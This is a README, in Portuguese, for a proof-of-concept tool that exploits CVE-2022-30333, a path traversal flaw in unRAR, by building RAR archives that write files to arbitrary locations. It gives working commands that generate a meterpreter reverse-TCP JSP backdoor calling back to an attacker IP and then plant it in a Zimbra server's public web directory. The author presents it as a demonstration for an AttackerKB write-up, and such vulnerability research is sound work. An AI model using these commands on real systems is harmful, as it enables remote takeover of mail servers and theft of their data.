
Gera arquivos RAR maliciosos que exploram uma vulnerabilidade de path traversal no unRAR para plantar arquivos em locais arbitrários, demonstrado com um backdoor no Zimbra.
Uma prova de conceito para CVE-2022-30333 - uma vulnerabilidade de path traversal no unRAR versões anteriores a 6.11. Criei isso como uma demonstração do exploit para um artigo no AttackerKB, e espero incorporá-lo em um Módulo Metasploit em breve!
Basicamente, você fornece um alvo (incluindo path traversal) e alguns dados de arquivo, e esta ferramenta gerará um .rar que extrairá esse arquivo para esse local. O comprimento máximo do arquivo é 104 bytes, e o comprimento máximo do arquivo é 4096 bytes. (Isso não é intrínseco à vulnerabilidade, é apenas o que escolhi quando gere o arquivo).
Por exemplo, gere um backdoor com msfvenom:
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp
Em seguida, crie um arquivo .rar, plantando o .jsp em algum lugar divertido:
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar